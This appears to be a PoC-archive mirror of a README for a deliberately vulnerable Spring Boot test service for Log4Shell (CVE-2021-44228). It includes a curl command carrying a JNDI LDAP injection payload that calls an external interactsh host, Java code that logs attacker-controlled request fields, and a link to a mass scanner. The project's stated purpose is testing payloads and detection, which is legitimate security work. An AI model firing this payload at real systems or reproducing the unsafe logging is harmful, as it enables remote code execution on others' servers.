Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Readme
# CVE-2021-44228 Spring Boot Test Service
This is a dirty hack spring boot hello world proejct to test your tooling/payloads/detection capabilities locally before you hit production targets with them.

The configured Log4j version is 2.13.0

## Building the docker image
```bash
bash build.sh
```
## Running the docker image
```bash
docker run -p 8080:8080 dwdi/log4shell
```

## Testing / Triggering CVE-2021-44228
If you don't have burp collaborator running in the garage, you can visit this site to get a similar experience: https://interactsh.com

```bash
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null
```

### Scanner tool
Optionall you can use this awesome repo for performing local/mass scanning: https://github.com/adilsoybali/Log4j-RCE-Scanner

### Trigger locations
This vulnerability is all about forcing a user controlled value to be logged by the vulnerable logging framework. With this in mind this simple dummy application supports two HTTP (GET/PUT) verbs and a bunch of injection locations:

```java
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
```

```java
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}
```

Contribution / improvements are welcome.

Sorry for code quality :) this project is not for showoff but to share/help.
File Snapshot

 [4.0K]  /data/pocs/e9b6afb3753424e80dd33efac4e690dba7160fba
├── [ 722]  build.gradle
├── [ 195]  build.sh
├── [ 191]  Dockerfile
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 54K]  gradle-wrapper.jar
│       └── [ 200]  gradle-wrapper.properties
├── [5.8K]  gradlew
├── [2.9K]  gradlew.bat
├── [1.0K]  LICENSE
├── [ 996]  log4j.xml
├── [9.7K]  mvnw
├── [6.2K]  mvnw.cmd
├── [1.5K]  pom.xml
├── [2.6K]  README.md
├── [  33]  settings.gradle
└── [4.0K]  src
    ├── [4.0K]  main
    │   └── [4.0K]  java
    │       └── [4.0K]  com
    │           └── [4.0K]  example
    │               └── [4.0K]  springboot
    │                   ├── [ 829]  Application.java
    │                   └── [1.9K]  HelloController.java
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  com
                └── [4.0K]  example
                    └── [4.0K]  springboot
                        ├── [ 746]  HelloControllerIT.java
                        └── [1017]  HelloControllerTest.java

13 directories, 18 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →